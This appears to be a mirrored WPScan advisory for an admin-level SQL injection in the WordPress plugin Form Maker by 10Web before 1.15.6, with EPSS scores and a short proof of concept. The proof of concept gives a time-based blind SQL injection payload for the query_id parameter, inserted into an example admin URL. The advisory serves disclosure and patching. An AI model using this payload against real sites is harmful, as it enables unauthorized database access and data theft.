Lucene search

K
wpvulndbNguyen Duy Quoc KhanhWPVDB-ID:DDC9ED69-D942-4FAD-BBF4-1BE3B86460D9
HistoryOct 03, 2022 - 12:00 a.m.

Form Maker by 10Web < 1.15.6 - Admin+ SQLI

2022-10-0300:00:00
Nguyen Duy Quoc Khanh
wpscan.com
13
form maker
10web
sql injection

EPSS

0.001

Percentile

37.7%

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

PoC

Create/edit a form, go to the Settings > MySQL Mapping (i.e /admin.php?page=manage_fm&task;=edit&current;_id=1&tab;=4&fieldset;_id=mapping). Copy the link to delete a query (create a query if there is none) and add the following payload in the query_id parameter: 1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP) e.g: https://example.com/wp-admin/admin.php?page=manage_fm&amp;nonce;_fm=27d813d111&amp;task;=remove_query&amp;current;_id=1&amp;query;_id=1 AND (SELECT 9312 FROM (SELECT(SLEEP(5)))hYkP)&fieldset;_id=mapping

EPSS

0.001

Percentile

37.7%

Related for WPVDB-ID:DDC9ED69-D942-4FAD-BBF4-1BE3B86460D9